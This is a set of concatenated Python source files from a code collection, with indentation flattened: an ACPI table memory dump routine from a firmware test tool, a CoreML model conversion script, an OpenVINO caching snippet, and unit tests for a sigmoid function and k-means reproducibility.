acpidir.create(fname).write(data)
print "Done"
fname = "address_list.txt"
print "Saving {}...".format(fname),
acpidir.create(fname).write(address_list)
print "Done"
except:
pass
def save_tables_object_format():
"""Save all ACPI tables to a single file.
The origin is the physical address shifted right by 2 bits. Origins
dont need to be in order and the length of any data block is
arbitrary. The address shift by 2 requires all memory data dumps
start on a 4-byte boundary and the 32-bit data blocks require a
4-byte ending alignment. This may force data from before the actual
table start and data beyond the actual table end."""
def dumpmem_dwords(mem):
"""Dump hexadecimal dwords for a memory buffer"""
s = ''
for chunk in bits.grouper(16, mem):
for dword in bits.grouper(4, chunk):
s += "".join(" " if x is None else "{:02x}".format(ord(x)) for x in reversed(dword))
s += " "
s += '\n'
return s
details = ''
data_list = ''
for signature in get_table_list():
for instance in itertools.count(1):
data = get_table(signature, instance)
if data is None:
break
basename = signature
if instance > 1:
basename += "{}".format(instance)
address = get_table_addr(signature, instance)
addr_adjust = address % 4
len_adjust = (len(data) + addr_adjust) % 4
if len_adjust:
len_adjust = 4 - len_adjust
if addr_adjust or len_adjust:
# Data is not aligned on dword boundary or len is not multiple of dwords
new_address = address - addr_adjust
new_length = len(data) + len_adjust
if addr_adjust:
print "Address modified from {} to {}".format(address, new_address)
if len_adjust:
print "Length modified from {} to {}".format(len(data), new_length)
data = bits.memory(new_address, new_length)
address = new_address
details += "{:5}: address={:#x}, address>>2={:#x}, len={}, len/4={}\n".format(basename, address, address>>2, len(data), len(data)/4)
print "Saving {}...".format(basename),
data_list += "/origin {:x}\n".format(address >> 2)
data_list += dumpmem_dwords(data)
print "Done"
data_list += "/eof\n"
fname = "acpi_memory.txt"
print "Saving {}...".format(fname),
bits.pyfs.add_static(fname, data_list)
print "Done"
fname = "acpi_details.txt"
print "Saving {}...".format(fname),
bits.pyfs.add_static(fname, details)
print "Done"
with ttypager.page():
print "The following files have been created:"
print " (python)/acpi_details.txt -- the ACPI table details."
print " (python)/acpi_memory.txt -- the ACPI table memory dump."
print
print open("(python)/acpi_details.txt").read()
print
print open("(python)/acpi_memory.txt").read()
|
057_BiSeNetV2/02_celebamaskhq/01_float32/08_saved_model_to_coreml.py
|
IgiArdiyanto/PINTO_model_zoo
| 1,529 |
117340
|
<gh_stars>1000+
### tensorflow==2.3.0
import tensorflow as tf
import coremltools as ct
mlmodel = ct.convert('saved_model_256x256', source='tensorflow')
mlmodel.save("bisenetv2_celebamaskhq_256x256_float32.mlmodel")
mlmodel = ct.convert('saved_model_448x448', source='tensorflow')
mlmodel.save("bisenetv2_celebamaskhq_448x448_float32.mlmodel")
mlmodel = ct.convert('saved_model_480x640', source='tensorflow')
mlmodel.save("bisenetv2_celebamaskhq_480x640_float32.mlmodel")
|
docs/snippets/ov_caching.py
|
kurylo/openvino
| 1,127 |
117351
|
<filename>docs/snippets/ov_caching.py
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
from openvino.runtime import Core
device_name = 'GNA'
xml_path = '/tmp/myModel.xml'
# ! [ov:caching:part0]
core = Core()
core.set_property({'CACHE_DIR': '/path/to/cache/dir'})
model = core.read_model(model=xml_path)
compiled_model = core.compile_model(model=model, device_name=device_name)
# ! [ov:caching:part0]
assert compiled_model
# ! [ov:caching:part1]
core = Core()
compiled_model = core.compile_model(model_path=xml_path, device_name=device_name)
# ! [ov:caching:part1]
assert compiled_model
# ! [ov:caching:part2]
core = Core()
core.set_property({'CACHE_DIR': '/path/to/cache/dir'})
compiled_model = core.compile_model(model_path=xml_path, device_name=device_name)
# ! [ov:caching:part2]
assert compiled_model
# ! [ov:caching:part3]
# Find 'EXPORT_IMPORT' capability in supported capabilities
caching_supported = 'EXPORT_IMPORT' in core.get_property(device_name, 'OPTIMIZATION_CAPABILITIES')
# ! [ov:caching:part3]
|
06_reproducibility/test_sigmoid.py
|
fanchi/ml-design-patterns
| 1,149 |
117361
|
<reponame>fanchi/ml-design-patterns<gh_stars>1000+
#!/usr/bin/env python3
import unittest
import numpy as np
def sigmoid(x):
return 1.0 / (1 + np.exp(-x))
class TestSigmoid(unittest.TestCase):
def test_zero(self):
self.assertAlmostEqual(sigmoid(0), 0.5)
def test_neginf(self):
self.assertAlmostEqual(sigmoid(float("-inf")), 0)
def test_inf(self):
self.assertAlmostEqual(sigmoid(float("inf")), 1)
def cluster_kmeans(X):
from sklearn import cluster
k_means = cluster.KMeans(n_clusters=10, random_state=10)
labels = k_means.fit(X).labels_[::]
#print(labels)
return labels
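# Note: random_state=10 above pins the k-means initialization; that determinism
# is what makes the repeatability assertion in TestKMeans below meaningful.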
class TestKMeans(unittest.TestCase):
def test_clustering(self):
from sklearn import cluster, datasets
X, _ = datasets.load_boston(return_X_y=True)
initial_result = cluster_kmeans(X)
for x in range(0, 10):
self.assertTrue(np.all(cluster_kmeans(X) == initial_result))
if __name__ == '__main__':
unittest.main()
|